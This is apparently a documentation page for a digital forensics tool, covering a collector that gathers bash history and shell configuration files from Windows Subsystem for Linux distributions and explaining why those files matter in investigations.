WSL
Overview
Section titled “Overview”Evidence: WSL
Description: Collect Windows Subsystem for Linux Files
Category: Applications
Platform: windows
Short Name: wsl
Is Parsed: No
Sent to Investigation Hub: No
Collect File(s): Yes
Background
Section titled “Background”Windows Subsystem for Linux (WSL) stores Linux user files including bash history, bash configuration, and logout scripts in the WSL distribution’s file system. These files track Linux command history and shell configurations.
Data Collected
Section titled “Data Collected”This collector gathers structured data about wsl.
Collection Method
Section titled “Collection Method”This collector gathers bash history, bashrc configuration, and bash logout files from WSL distribution packages in LocalState directories.
Forensic Value
Section titled “Forensic Value”WSL files reveal Linux commands executed, scripts run, development activities, and potentially malicious commands issued through the Linux subsystem. Bash history is critical for identifying attacker activities, privilege escalation attempts, and data exfiltration through WSL.